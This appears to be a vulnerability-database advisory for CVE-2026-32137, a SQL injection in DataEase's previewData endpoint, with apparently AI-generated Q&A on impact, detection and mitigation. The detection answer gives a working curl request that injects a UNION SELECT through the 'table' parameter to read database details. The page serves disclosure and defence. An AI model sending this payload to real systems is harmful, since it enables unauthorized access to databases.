CVE-2026-32137
SQL Injection in Dataease /de2api/datasource/previewData Endpoint
Publication date: 2026-03-12
Last updated on: 2026-03-13
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dataease | dataease | to 2.10.20 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': "CVE-2026-32137 is a high-severity SQL Injection vulnerability in DataEase versions prior to 2.10.20. The issue occurs because the 'table' parameter in the POST endpoint /de2api/datasource/previewData is directly concatenated into an SQL query string without any filtering or parameterization."}, {'type': 'paragraph', 'content': "Since the 'table' parameter is user-controlled, an attacker can craft malicious table names containing SQL injection payloads. This allows the attacker to inject arbitrary SQL code into the query."}, {'type': 'paragraph', 'content': 'For example, an attacker can send a specially crafted request that injects a UNION SELECT statement to retrieve sensitive database information such as the database user, current database name, version, and compile OS.'}, {'type': 'paragraph', 'content': 'This vulnerability was fixed in version 2.10.20 by presumably adding proper input validation or parameterization.'}] [1]
How can this vulnerability impact me? :
This SQL Injection vulnerability can have severe impacts including unauthorized access to sensitive database information.
An attacker exploiting this vulnerability can execute arbitrary SQL commands, potentially leading to data leakage, data corruption, or unauthorized data manipulation.
Because the vulnerability allows extraction of database details and possibly other sensitive data, it can compromise the confidentiality and integrity of your data.
The vulnerability has a high CVSS score of 9.3, indicating it is critical and can be exploited remotely without authentication.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by attempting to exploit the SQL injection point in the POST endpoint `/de2api/datasource/previewData` using crafted payloads in the `table` parameter.'}, {'type': 'paragraph', 'content': 'A detection method involves sending a POST request with a malicious payload that tries to inject SQL code, such as a UNION SELECT statement, to observe if the system returns database information or behaves unexpectedly.'}, {'type': 'paragraph', 'content': 'Example command using curl to test the vulnerability:'}, {'type': 'list_item', 'content': 'curl -X POST https://[target]/de2api/datasource/previewData -H \'Content-Type: application/json\' -d \'{"table": "area` WHERE 1=2 UNION SELECT user(),database(),version(),@@version_compile_os-- ", "id": "985188400292302848"}\''}, {'type': 'paragraph', 'content': 'If the response contains database user, database name, version, or OS information, it indicates the presence of the SQL injection vulnerability.'}] [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate and recommended mitigation step is to upgrade DataEase to version 2.10.20 or later, where the vulnerability has been fixed.
This fix presumably includes proper input validation or parameterization of the `table` parameter to prevent SQL injection.
Until the upgrade can be performed, restrict access to the vulnerable endpoint `/de2api/datasource/previewData` to trusted users or networks to reduce the risk of exploitation.